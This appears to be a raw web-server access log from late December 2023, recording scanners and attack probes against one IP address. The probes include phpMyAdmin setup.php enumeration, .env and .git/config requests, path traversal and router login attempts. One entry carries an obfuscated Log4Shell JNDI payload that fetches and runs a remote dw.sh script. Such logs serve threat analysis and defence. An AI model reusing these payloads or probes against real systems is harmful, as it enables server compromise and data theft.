101.43.54.155 - - [28/Dec/2023:11:55:53 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:56 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:58 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:55:58 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:00 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:03 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:05 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:05 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:06 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:07 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:56:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:35 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:36 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:36 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:37 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:37 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:42 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:58:43 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:11:59:47 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:22 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:23 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:30 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:30 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:31 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:00:48 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:01:19 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:01:20 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:03:29 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:03:32 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:03:33 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:03:34 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 101.43.54.155 - - [28/Dec/2023:12:03:37 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

51.254.59.113 - - [28/Dec/2023:13:24:12 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

198.235.24.5 - - [28/Dec/2023:13:46:29 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.235.24.5 - - [28/Dec/2023:13:46:30 -0600] "\x16\x03\x01" 400 0 "-" "-"

198.199.111.202 - - [28/Dec/2023:15:00:29 -0600] "GET /actuator/health HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

168.232.15.99 - - [28/Dec/2023:15:13:02 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

45.142.182.76 - - [28/Dec/2023:16:27:48 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

107.170.208.32 - - [28/Dec/2023:18:22:32 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

65.49.20.66 - - [28/Dec/2023:18:57:07 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0" 65.49.20.66 - - [28/Dec/2023:18:58:57 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 65.49.20.66 - - [28/Dec/2023:18:59:37 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"

104.199.31.214 - - [28/Dec/2023:20:17:12 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

205.210.31.244 - - [28/Dec/2023:20:47:10 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

162.216.149.156 - - [28/Dec/2023:20:53:25 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

185.180.140.4 - - [28/Dec/2023:23:06:42 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.140.4 - - [28/Dec/2023:23:06:42 -0600] "GET /showLogin.cc HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

84.54.51.80 - - [28/Dec/2023:23:31:32 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

45.95.147.236 - - [28/Dec/2023:23:35:14 -0600] "GET / HTTP/1.1" 200 297 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.95.147.236:2411/TomcatBypass/Command/Base64/bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly80NS45NS4xNDcuMjM2L2R3LnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly80NS45NS4xNDguMjM2L2R3LnNoIHwgc2g7}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.95.147.236:2411/TomcatBypass/Command/Base64/bWtkaXIgLXAgL3RtcC8kKHdob2FtaSk7IGNkIC90bXAvJCh3aG9hbWkpOyB3Z2V0IGh0dHA6Ly80NS45NS4xNDcuMjM2L2R3LnNoIC1PLSB8IHNoOyBjdXJsIGh0dHA6Ly80NS45NS4xNDguMjM2L2R3LnNoIHwgc2g7}')"

December 29, 2023

178.128.164.31 - - [29/Dec/2023:00:03:41 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

194.165.16.73 - - [29/Dec/2023:00:20:31 -0600] "\x03" 400 0 "-" "-"

212.71.251.87 - - [29/Dec/2023:01:26:23 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 212.71.251.87 - - [29/Dec/2023:01:26:30 -0600] "\x16\x03\x01" 400 0 "-" "-" 212.71.251.87 - - [29/Dec/2023:01:26:30 -0600] "\x16\x03\x01" 400 0 "-" "-" 212.71.251.87 - - [29/Dec/2023:01:26:30 -0600] "\x16\x03\x01" 400 0 "-" "-"

193.106.29.122 - - [29/Dec/2023:01:33:09 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

83.97.73.87 - - [29/Dec/2023:01:57:27 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

185.224.128.191 - - [29/Dec/2023:03:10:41 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

83.97.73.87 - - [29/Dec/2023:03:35:11 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

91.92.249.159 - - [29/Dec/2023:03:51:53 -0600] "GET //.env HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

185.224.128.191 - - [29/Dec/2023:04:07:16 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

192.241.207.54 - - [29/Dec/2023:04:20:40 -0600] "GET /portal/redlion HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

141.98.7.188 - - [29/Dec/2023:04:46:56 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

103.187.190.135 - - [29/Dec/2023:05:46:10 -0600] "GET /solr/admin/info/system HTTP/1.1" 404 454 "-" "Go-http-client/1.1" 103.187.190.135 - - [29/Dec/2023:05:46:10 -0600] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 454 "-" "Go-http-client/1.1"

64.225.17.249 - - [29/Dec/2023:05:48:27 -0600] "GET /.git/config HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

15.204.52.61 - - [29/Dec/2023:06:30:06 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

213.32.39.36 - - [29/Dec/2023:06:30:44 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

176.113.115.220 - - [29/Dec/2023:06:58:29 -0600] "\x03" 400 0 "-" "-"

103.203.57.1 - - [29/Dec/2023:07:10:40 -0600] "GET / HTTP/1.1" 200 260 "-" "HTTP Banner Detection (https://security.ipip.net)"

35.202.9.133 - - [29/Dec/2023:07:13:50 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"

184.105.247.196 - - [29/Dec/2023:07:26:44 -0600] "\x16\x03\x01" 400 0 "-" "-"

5.196.102.65 - - [29/Dec/2023:07:51:34 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

124.89.86.187 - - [29/Dec/2023:08:35:17 -0600] "GET / HTTP/1.1" 400 0 "-" "-"

176.97.210.231 - - [29/Dec/2023:09:20:19 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

91.92.243.232 - - [29/Dec/2023:10:22:37 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [29/Dec/2023:10:22:46 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

45.142.182.85 - - [29/Dec/2023:10:34:03 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

198.235.24.15 - - [29/Dec/2023:10:36:18 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

118.194.251.63 - - [29/Dec/2023:10:48:18 -0600] "GET / HTTP/1.1" 200 241 "-" "curl/7.29.0" 118.194.251.63 - - [29/Dec/2023:10:48:20 -0600] "\x16\x03\x01" 400 0 "-" "-" 118.194.251.63 - - [29/Dec/2023:10:48:20 -0600] "t3 12.1.2\n" 400 0 "-" "-"

44.210.127.169 - - [29/Dec/2023:10:58:14 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3067.52 Safari/537.32"

35.203.211.97 - - [29/Dec/2023:11:13:24 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

164.90.194.29 - - [29/Dec/2023:11:38:47 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

192.241.224.28 - - [29/Dec/2023:12:48:32 -0600] "GET /hudson HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

84.54.51.141 - - [29/Dec/2023:13:25:02 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

107.170.252.43 - - [29/Dec/2023:13:50:38 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

205.210.31.100 - - [29/Dec/2023:13:50:44 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.100 - - [29/Dec/2023:13:50:44 -0600] "\x16\x03\x01" 400 0 "-" "-"

176.97.210.231 - - [29/Dec/2023:13:58:11 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

91.92.243.232 - - [29/Dec/2023:14:13:41 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [29/Dec/2023:14:13:50 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

185.150.26.205 - - [29/Dec/2023:14:52:47 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

94.156.64.217 - - [29/Dec/2023:14:53:57 -0600] "GET //.env HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

45.15.115.230 - - [29/Dec/2023:15:36:39 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

195.62.15.247 - - [29/Dec/2023:16:37:00 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

174.138.17.5 - - [29/Dec/2023:16:56:28 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

128.14.134.134 - - [29/Dec/2023:17:26:11 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

45.142.182.76 - - [29/Dec/2023:17:33:08 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

176.97.210.229 - - [29/Dec/2023:17:44:17 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

192.241.235.9 - - [29/Dec/2023:18:36:35 -0600] "GET /druid/index.html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

167.94.138.127 - - [29/Dec/2023:18:54:44 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.127 - - [29/Dec/2023:18:54:47 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.127 - - [29/Dec/2023:18:54:47 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.127 - - [29/Dec/2023:18:54:47 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

138.68.90.225 - - [29/Dec/2023:19:13:27 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

34.79.162.186 - - [29/Dec/2023:20:01:56 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

176.97.210.231 - - [29/Dec/2023:21:20:30 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

94.102.61.10 - - [29/Dec/2023:21:56:19 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

216.218.206.66 - - [29/Dec/2023:22:02:25 -0600] "\x16\x03\x01" 400 0 "-" "-"

186.33.110.4 - - [29/Dec/2023:22:09:46 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

103.67.163.199 - - [29/Dec/2023:22:14:49 -0600] "GET /.env HTTP/1.1" 404 491 "-" "python-requests/2.26.0" 103.67.163.199 - - [29/Dec/2023:22:14:50 -0600] "POST / HTTP/1.1" 200 296 "-" "python-requests/2.26.0"

167.248.133.49 - - [29/Dec/2023:22:28:11 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.49 - - [29/Dec/2023:22:28:11 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.248.133.49 - - [29/Dec/2023:22:28:11 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

184.105.247.252 - - [29/Dec/2023:23:23:41 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 184.105.247.252 - - [29/Dec/2023:23:26:24 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" 184.105.247.252 - - [29/Dec/2023:23:27:36 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"

35.203.211.55 - - [29/Dec/2023:23:37:05 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

172.105.128.11 - - [29/Dec/2023:23:38:03 -0600] "\x16\x03\x01" 400 0 "-" "-"

87.236.176.75 - - [29/Dec/2023:23:45:24 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"

45.142.182.85 - - [29/Dec/2023:23:51:49 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

185.224.128.191 - - [29/Dec/2023:23:59:20 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

December 30, 2023

37.44.238.68 - - [30/Dec/2023:00:37:54 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 185.224.128.191 - - [30/Dec/2023:01:07:15 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

91.92.243.232 - - [30/Dec/2023:01:12:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [30/Dec/2023:01:12:24 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

191.101.157.76 - - [30/Dec/2023:01:51:34 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 191.101.157.76 - - [30/Dec/2023:01:51:35 -0600] "POST / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

104.248.164.220 - - [30/Dec/2023:01:56:21 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

45.142.182.76 - - [30/Dec/2023:02:06:36 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

185.150.26.205 - - [30/Dec/2023:02:52:44 -0600] "GET / HTTP/1.1" 200 241 "-" "-"

198.235.24.151 - - [30/Dec/2023:03:20:44 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

138.68.20.164 - - [30/Dec/2023:03:26:19 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

194.195.213.203 - - [30/Dec/2023:03:26:27 -0600] "POST /wsman HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET /auth1.html HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET /auth.html HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET /sslvpnLogin.html HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET /api/sonicos/auth HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 45.33.94.30 - - [30/Dec/2023:03:26:39 -0600] "GET /api/sonicos/tfa HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

45.56.77.156 - - [30/Dec/2023:03:27:04 -0600] "HEAD / HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 45.56.77.156 - - [30/Dec/2023:03:27:20 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 45.56.77.156 - - [30/Dec/2023:03:31:58 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 45.56.77.156 - - [30/Dec/2023:03:31:58 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

45.56.109.99 - - [30/Dec/2023:03:44:22 -0600] "GET / HTTP/1.0" 200 260 "-" "-"

142.93.95.81 - - [30/Dec/2023:03:44:55 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 142.93.95.81 - - [30/Dec/2023:03:44:56 -0600] "Gh0st\xad" 400 0 "-" "-" 142.93.95.81 - - [30/Dec/2023:03:45:00 -0600] "HELP" 400 0 "-" "-" 142.93.95.81 - - [30/Dec/2023:03:45:00 -0600] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 0 "-" "-" 142.93.95.81 - - [30/Dec/2023:03:45:01 -0600] "\x16\x03\x01" 400 0 "-" "-" 142.93.95.81 - - [30/Dec/2023:03:45:03 -0600] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n" 400 0 "-" "-"

117.235.121.221 - - [30/Dec/2023:03:54:08 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

80.66.88.215 - - [30/Dec/2023:04:31:11 -0600] "\x03" 400 0 "-" "-"

176.113.115.65 - - [30/Dec/2023:04:33:13 -0600] "\x03" 400 0 "-" "-"

83.97.73.87 - - [30/Dec/2023:05:03:48 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

